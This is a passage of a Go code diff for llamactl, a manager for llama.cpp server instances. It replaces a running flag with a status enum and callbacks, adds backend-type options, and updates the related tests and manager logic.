LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
}, },
} }
instance := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
data, err := json.Marshal(instance) data, err := json.Marshal(instance)
if err != nil { if err != nil {
@@ -188,7 +210,7 @@ func TestMarshalJSON(t *testing.T) {
} }
// Check that JSON contains expected fields // Check that JSON contains expected fields
var result map[string]interface{} var result map[string]any
err = json.Unmarshal(data, &result) err = json.Unmarshal(data, &result)
if err != nil { if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err) t.Fatalf("JSON unmarshal failed: %v", err)
@@ -197,8 +219,8 @@ func TestMarshalJSON(t *testing.T) {
if result["name"] != "test-instance" { if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"]) t.Errorf("Expected name 'test-instance', got %v", result["name"])
} }
if result["running"] != false { if result["status"] != "stopped" {
t.Errorf("Expected running false, got %v", result["running"]) t.Errorf("Expected status 'stopped', got %v", result["status"])
} }
// Check that options are included // Check that options are included
@@ -210,20 +232,41 @@ func TestMarshalJSON(t *testing.T) {
if !ok { if !ok {
t.Error("Expected options to be a map") t.Error("Expected options to be a map")
} }
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"]) // Check backend type
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
}
// Check backend options
backend_options_data, ok := options_map["backend_options"]
if !ok {
t.Error("Expected backend_options to be included in JSON")
}
backend_options_map, ok := backend_options_data.(map[string]any)
if !ok {
t.Error("Expected backend_options to be a map")
}
if backend_options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
}
if backend_options_map["port"] != float64(8080) {
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
} }
} }
func TestUnmarshalJSON(t *testing.T) { func TestUnmarshalJSON(t *testing.T) {
jsonData := `{ jsonData := `{
"name": "test-instance", "name": "test-instance",
"running": true, "status": "running",
"options": { "options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false, "auto_restart": false,
"max_restarts": 5 "max_restarts": 5,
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"port": 8080
}
} }
}` }`
@@ -236,19 +279,25 @@ func TestUnmarshalJSON(t *testing.T) {
if inst.Name != "test-instance" { if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name) t.Errorf("Expected name 'test-instance', got %q", inst.Name)
} }
if !inst.Running { if !inst.IsRunning() {
t.Error("Expected running to be true") t.Error("Expected status to be running")
} }
opts := inst.GetOptions() opts := inst.GetOptions()
if opts == nil { if opts == nil {
t.Fatal("Expected options to be set") t.Fatal("Expected options to be set")
} }
if opts.Model != "/path/to/model.gguf" { if opts.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model) t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
} }
if opts.Port != 8080 { if opts.LlamaServerOptions == nil {
t.Errorf("Expected port 8080, got %d", opts.Port) t.Fatal("Expected LlamaServerOptions to be set")
}
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
} }
if opts.AutoRestart == nil || *opts.AutoRestart { if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false") t.Error("Expected AutoRestart to be false")
@@ -298,12 +347,16 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts, MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay, RestartDelay: tt.restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
instance := instance.NewInstance("test", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test", globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions() opts := instance.GetOptions()
if opts.MaxRestarts == nil { if opts.MaxRestarts == nil {

View File

@@ -16,7 +16,7 @@ func (i *Process) Start() error {
i.mu.Lock() i.mu.Lock()
defer i.mu.Unlock() defer i.mu.Unlock()
if i.Running { if i.IsRunning() {
return fmt.Errorf("instance %s is already running", i.Name) return fmt.Errorf("instance %s is already running", i.Name)
} }
@@ -40,7 +40,6 @@ func (i *Process) Start() error {
} }
args := i.options.BuildCommandArgs() args := i.options.BuildCommandArgs()
i.ctx, i.cancel = context.WithCancel(context.Background()) i.ctx, i.cancel = context.WithCancel(context.Background())
i.cmd = exec.CommandContext(i.ctx, "llama-server", args...) i.cmd = exec.CommandContext(i.ctx, "llama-server", args...)
@@ -65,7 +64,7 @@ func (i *Process) Start() error {
return fmt.Errorf("failed to start instance %s: %w", i.Name, err) return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
} }
i.Running = true i.SetStatus(Running)
// Create channel for monitor completion signaling // Create channel for monitor completion signaling
i.monitorDone = make(chan struct{}) i.monitorDone = make(chan struct{})
@@ -82,7 +81,7 @@ func (i *Process) Start() error {
func (i *Process) Stop() error { func (i *Process) Stop() error {
i.mu.Lock() i.mu.Lock()
if !i.Running { if !i.IsRunning() {
// Even if not running, cancel any pending restart // Even if not running, cancel any pending restart
if i.restartCancel != nil { if i.restartCancel != nil {
i.restartCancel() i.restartCancel()
@@ -99,8 +98,8 @@ func (i *Process) Stop() error {
i.restartCancel = nil i.restartCancel = nil
} }
// Set running to false first to signal intentional stop // Set status to stopped first to signal intentional stop
i.Running = false i.SetStatus(Stopped)
// Clean up the proxy // Clean up the proxy
i.proxy = nil i.proxy = nil
@@ -110,19 +109,25 @@ func (i *Process) Stop() error {
i.mu.Unlock() i.mu.Unlock()
// Stop the process with SIGINT // Stop the process with SIGINT if cmd exists
if i.cmd.Process != nil { if i.cmd != nil && i.cmd.Process != nil {
if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil { if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err) log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
} }
} }
// If no process exists, we can return immediately
if i.cmd == nil || monitorDone == nil {
i.logger.Close()
return nil
}
select { select {
case <-monitorDone: case <-monitorDone:
// Process exited normally // Process exited normally
case <-time.After(30 * time.Second): case <-time.After(30 * time.Second):
// Force kill if it doesn't exit within 30 seconds // Force kill if it doesn't exit within 30 seconds
if i.cmd.Process != nil { if i.cmd != nil && i.cmd.Process != nil {
killErr := i.cmd.Process.Kill() killErr := i.cmd.Process.Kill()
if killErr != nil { if killErr != nil {
log.Printf("Failed to force kill instance %s: %v", i.Name, killErr) log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
@@ -144,8 +149,12 @@ func (i *Process) Stop() error {
return nil return nil
} }
func (i *Process) LastRequestTime() int64 {
return i.lastRequestTime.Load()
}
func (i *Process) WaitForHealthy(timeout int) error { func (i *Process) WaitForHealthy(timeout int) error {
if !i.Running { if !i.IsRunning() {
return fmt.Errorf("instance %s is not running", i.Name) return fmt.Errorf("instance %s is not running", i.Name)
} }
@@ -163,11 +172,17 @@ func (i *Process) WaitForHealthy(timeout int) error {
} }
// Build the health check URL directly // Build the health check URL directly
host := opts.Host var host string
var port int
switch opts.BackendType {
case "llama-cpp":
host = opts.LlamaServerOptions.Host
port = opts.LlamaServerOptions.Port
}
if host == "" { if host == "" {
host = "localhost" host = "localhost"
} }
healthURL := fmt.Sprintf("http://%s:%d/health", host, opts.Port) healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
// Create a dedicated HTTP client for health checks // Create a dedicated HTTP client for health checks
client := &http.Client{ client := &http.Client{
@@ -227,12 +242,12 @@ func (i *Process) monitorProcess() {
i.mu.Lock() i.mu.Lock()
// Check if the instance was intentionally stopped // Check if the instance was intentionally stopped
if !i.Running { if !i.IsRunning() {
i.mu.Unlock() i.mu.Unlock()
return return
} }
i.Running = false i.SetStatus(Stopped)
i.logger.Close() i.logger.Close()
// Cancel any existing restart context since we're handling a new exit // Cancel any existing restart context since we're handling a new exit
@@ -257,6 +272,7 @@ func (i *Process) handleRestart() {
// Validate restart conditions and get safe parameters // Validate restart conditions and get safe parameters
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions() shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
if !shouldRestart { if !shouldRestart {
i.SetStatus(Failed)
i.mu.Unlock() i.mu.Unlock()
return return
} }

141
pkg/instance/options.go Normal file
View File

@@ -0,0 +1,141 @@
package instance
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"log"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"` // seconds
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// LlamaServerOptions contains the options for the llama server
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := &struct {
*Alias
}{
Alias: (*Alias)(c),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Parse backend-specific options
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.BackendOptions != nil {
// Convert map to JSON and then unmarshal to LlamaServerOptions
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
}
}
default:
return fmt.Errorf("unknown backend type: %s", c.BackendType)
}
return nil
}
// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := struct {
*Alias
}{
Alias: (*Alias)(c),
}
// Convert LlamaServerOptions back to BackendOptions map for JSON
if c.BackendType == backends.BackendTypeLlamaCpp && c.LlamaServerOptions != nil {
data, err := json.Marshal(c.LlamaServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
return json.Marshal(aux)
}
// ValidateAndApplyDefaults validates the instance options and applies constraints
func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// Validate and apply constraints
if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
*c.MaxRestarts = 0
}
if c.RestartDelay != nil && *c.RestartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, *c.RestartDelay)
*c.RestartDelay = 0
}
if c.IdleTimeout != nil && *c.IdleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, *c.IdleTimeout)
*c.IdleTimeout = 0
}
// Apply defaults from global settings for nil fields
if globalSettings != nil {
if c.AutoRestart == nil {
c.AutoRestart = &globalSettings.DefaultAutoRestart
}
if c.MaxRestarts == nil {
c.MaxRestarts = &globalSettings.DefaultMaxRestarts
}
if c.RestartDelay == nil {
c.RestartDelay = &globalSettings.DefaultRestartDelay
}
if c.OnDemandStart == nil {
c.OnDemandStart = &globalSettings.DefaultOnDemandStart
}
if c.IdleTimeout == nil {
defaultIdleTimeout := 0
c.IdleTimeout = &defaultIdleTimeout
}
}
}
// BuildCommandArgs builds command line arguments for the backend
func (c *CreateInstanceOptions) BuildCommandArgs() []string {
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
return c.LlamaServerOptions.BuildCommandArgs()
}
}
return []string{}
}

70
pkg/instance/status.go Normal file
View File

@@ -0,0 +1,70 @@
package instance
import (
"encoding/json"
"log"
)
// Enum for instance status
type InstanceStatus int
const (
Stopped InstanceStatus = iota
Running
Failed
)
var nameToStatus = map[string]InstanceStatus{
"stopped": Stopped,
"running": Running,
"failed": Failed,
}
var statusToName = map[InstanceStatus]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
}
func (p *Process) SetStatus(status InstanceStatus) {
oldStatus := p.Status
p.Status = status
if p.onStatusChange != nil {
p.onStatusChange(oldStatus, status)
}
}
func (p *Process) GetStatus() InstanceStatus {
return p.Status
}
// IsRunning returns true if the status is Running
func (p *Process) IsRunning() bool {
return p.Status == Running
}
func (s InstanceStatus) MarshalJSON() ([]byte, error) {
name, ok := statusToName[s]
if !ok {
name = "stopped" // Default to "stopped" for unknown status
}
return json.Marshal(name)
}
// UnmarshalJSON implements json.Unmarshaler
func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
var str string
if err := json.Unmarshal(data, &str); err != nil {
return err
}
status, ok := nameToStatus[str]
if !ok {
log.Printf("Unknown instance status: %s", str)
status = Stopped // Default to Stopped on unknown status
}
*s = status
return nil
}

View File

@@ -13,7 +13,7 @@ func (i *Process) ShouldTimeout() bool {
i.mu.RLock() i.mu.RLock()
defer i.mu.RUnlock() defer i.mu.RUnlock()
if !i.Running || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 { if !i.IsRunning() || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false return false
} }

View File

@@ -1,6 +1,7 @@
package instance_test package instance_test
import ( import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config" "llamactl/pkg/config"
"llamactl/pkg/instance" "llamactl/pkg/instance"
@@ -37,12 +38,16 @@ func TestUpdateLastRequestTime(t *testing.T) {
} }
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Test that UpdateLastRequestTime doesn't panic // Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime() inst.UpdateLastRequestTime()
@@ -56,12 +61,16 @@ func TestShouldTimeout_NotRunning(t *testing.T) {
idleTimeout := 1 // 1 minute idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout, IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Instance is not running, should not timeout regardless of configuration // Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() { if inst.ShouldTimeout() {
@@ -85,16 +94,20 @@ func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
for _, tt := range tests { for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout, IdleTimeout: tt.idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Simulate running state // Simulate running state
inst.Running = true inst.SetStatus(instance.Running)
if inst.ShouldTimeout() { if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name) t.Errorf("Instance with %s should not timeout", tt.name)
@@ -111,13 +124,17 @@ func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
idleTimeout := 5 // 5 minutes idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout, IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
inst.Running = true mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Update last request time to now // Update last request time to now
inst.UpdateLastRequestTime() inst.UpdateLastRequestTime()
@@ -136,13 +153,17 @@ func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
idleTimeout := 1 // 1 minute idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout, IdleTimeout: &idleTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
inst.Running = true mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Use MockTimeProvider to simulate old last request time // Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now()) mockTime := NewMockTimeProvider(time.Now())
@@ -179,12 +200,16 @@ func TestTimeoutConfiguration_Validation(t *testing.T) {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout, IdleTimeout: tt.inputTimeout,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
opts := inst.GetOptions() opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout { if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {

View File

@@ -21,17 +21,20 @@ type InstanceManager interface {
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
DeleteInstance(name string) error DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error) StartInstance(name string) (*instance.Process, error)
IsMaxRunningInstancesReached() bool
StopInstance(name string) (*instance.Process, error) StopInstance(name string) (*instance.Process, error)
EvictLRUInstance() error
RestartInstance(name string) (*instance.Process, error) RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error) GetInstanceLogs(name string) (string, error)
Shutdown() Shutdown()
} }
type instanceManager struct { type instanceManager struct {
mu sync.RWMutex mu sync.RWMutex
instances map[string]*instance.Process instances map[string]*instance.Process
ports map[int]bool runningInstances map[string]struct{}
instancesConfig config.InstancesConfig ports map[int]bool
instancesConfig config.InstancesConfig
// Timeout checker // Timeout checker
timeoutChecker *time.Ticker timeoutChecker *time.Ticker
@@ -46,9 +49,10 @@ func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
} }
im := &instanceManager{ im := &instanceManager{
instances: make(map[string]*instance.Process), instances: make(map[string]*instance.Process),
ports: make(map[int]bool), runningInstances: make(map[string]struct{}),
instancesConfig: instancesConfig, ports: make(map[int]bool),
instancesConfig: instancesConfig,
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute), timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}), shutdownChan: make(chan struct{}),
@@ -121,10 +125,10 @@ func (im *instanceManager) persistInstance(instance *instance.Process) error {
func (im *instanceManager) Shutdown() { func (im *instanceManager) Shutdown() {
im.mu.Lock() im.mu.Lock()
defer im.mu.Unlock()
// Check if already shutdown // Check if already shutdown
if im.isShutdown { if im.isShutdown {
im.mu.Unlock()
return return
} }
im.isShutdown = true im.isShutdown = true
@@ -132,27 +136,32 @@ func (im *instanceManager) Shutdown() {
// Signal the timeout checker to stop // Signal the timeout checker to stop
close(im.shutdownChan) close(im.shutdownChan)
// Release lock temporarily to wait for goroutine // Create a list of running instances to stop
var runningInstances []*instance.Process
var runningNames []string
for name, inst := range im.instances {
if inst.IsRunning() {
runningInstances = append(runningInstances, inst)
runningNames = append(runningNames, name)
}
}
// Release lock before stopping instances to avoid deadlock
im.mu.Unlock() im.mu.Unlock()
// Wait for the timeout checker goroutine to actually stop // Wait for the timeout checker goroutine to actually stop
<-im.shutdownDone <-im.shutdownDone
// Reacquire lock
im.mu.Lock()
// Now stop the ticker // Now stop the ticker
if im.timeoutChecker != nil { if im.timeoutChecker != nil {
im.timeoutChecker.Stop() im.timeoutChecker.Stop()
} }
// Stop instances without holding the manager lock
var wg sync.WaitGroup var wg sync.WaitGroup
wg.Add(len(im.instances)) wg.Add(len(runningInstances))
for name, inst := range im.instances {
if !inst.Running {
wg.Done() // If instance is not running, just mark it as done
continue
}
for i, inst := range runningInstances {
go func(name string, inst *instance.Process) { go func(name string, inst *instance.Process) {
defer wg.Done() defer wg.Done()
fmt.Printf("Stopping instance %s...\n", name) fmt.Printf("Stopping instance %s...\n", name)
@@ -160,7 +169,7 @@ func (im *instanceManager) Shutdown() {
if err := inst.Stop(); err != nil { if err := inst.Stop(); err != nil {
fmt.Printf("Error stopping instance %s: %v\n", name, err) fmt.Printf("Error stopping instance %s: %v\n", name, err)
} }
}(name, inst) }(runningNames[i], inst)
} }
wg.Wait() wg.Wait()
@@ -227,16 +236,20 @@ func (im *instanceManager) loadInstance(name, path string) error {
return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name) return fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, persistedInstance.Name)
} }
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
im.onStatusChange(persistedInstance.Name, oldStatus, newStatus)
}
// Create new inst using NewInstance (handles validation, defaults, setup) // Create new inst using NewInstance (handles validation, defaults, setup)
inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions()) inst := instance.NewInstance(name, &im.instancesConfig, persistedInstance.GetOptions(), statusCallback)
// Restore persisted fields that NewInstance doesn't set // Restore persisted fields that NewInstance doesn't set
inst.Created = persistedInstance.Created inst.Created = persistedInstance.Created
inst.Running = persistedInstance.Running inst.SetStatus(persistedInstance.Status)
// Check for port conflicts and add to maps // Check for port conflicts and add to maps
if inst.GetOptions() != nil && inst.GetOptions().Port > 0 { if inst.GetPort() > 0 {
port := inst.GetOptions().Port port := inst.GetPort()
if im.ports[port] { if im.ports[port] {
return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port) return fmt.Errorf("port conflict: instance %s wants port %d which is already in use", name, port)
} }
@@ -252,7 +265,7 @@ func (im *instanceManager) autoStartInstances() {
im.mu.RLock() im.mu.RLock()
var instancesToStart []*instance.Process var instancesToStart []*instance.Process
for _, inst := range im.instances { for _, inst := range im.instances {
if inst.Running && // Was running when persisted if inst.IsRunning() && // Was running when persisted
inst.GetOptions() != nil && inst.GetOptions() != nil &&
inst.GetOptions().AutoRestart != nil && inst.GetOptions().AutoRestart != nil &&
*inst.GetOptions().AutoRestart { *inst.GetOptions().AutoRestart {
@@ -264,9 +277,20 @@ func (im *instanceManager) autoStartInstances() {
for _, inst := range instancesToStart { for _, inst := range instancesToStart {
log.Printf("Auto-starting instance %s", inst.Name) log.Printf("Auto-starting instance %s", inst.Name)
// Reset running state before starting (since Start() expects stopped instance) // Reset running state before starting (since Start() expects stopped instance)
inst.Running = false inst.SetStatus(instance.Stopped)
if err := inst.Start(); err != nil { if err := inst.Start(); err != nil {
log.Printf("Failed to auto-start instance %s: %v", inst.Name, err) log.Printf("Failed to auto-start instance %s: %v", inst.Name, err)
} }
} }
} }
func (im *instanceManager) onStatusChange(name string, oldStatus, newStatus instance.InstanceStatus) {
im.mu.Lock()
defer im.mu.Unlock()
if newStatus == instance.Running {
im.runningInstances[name] = struct{}{}
} else {
delete(im.runningInstances, name)
}
}

View File

@@ -2,6 +2,7 @@ package manager_test
import ( import (
"fmt" "fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config" "llamactl/pkg/config"
"llamactl/pkg/instance" "llamactl/pkg/instance"
@@ -11,7 +12,6 @@ import (
"strings" "strings"
"sync" "sync"
"testing" "testing"
"time"
) )
func TestNewInstanceManager(t *testing.T) { func TestNewInstanceManager(t *testing.T) {
@@ -26,13 +26,13 @@ func TestNewInstanceManager(t *testing.T) {
TimeoutCheckInterval: 5, TimeoutCheckInterval: 5,
} }
manager := manager.NewInstanceManager(cfg) mgr := manager.NewInstanceManager(cfg)
if manager == nil { if mgr == nil {
t.Fatal("NewInstanceManager returned nil") t.Fatal("NewInstanceManager returned nil")
} }
// Test initial state // Test initial state
instances, err := manager.ListInstances() instances, err := mgr.ListInstances()
if err != nil { if err != nil {
t.Fatalf("ListInstances failed: %v", err) t.Fatalf("ListInstances failed: %v", err)
} }
@@ -41,217 +41,6 @@ func TestNewInstanceManager(t *testing.T) {
} }
} }
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.Running {
t.Error("New instance should not be running")
}
if inst.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetOptions().Port)
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
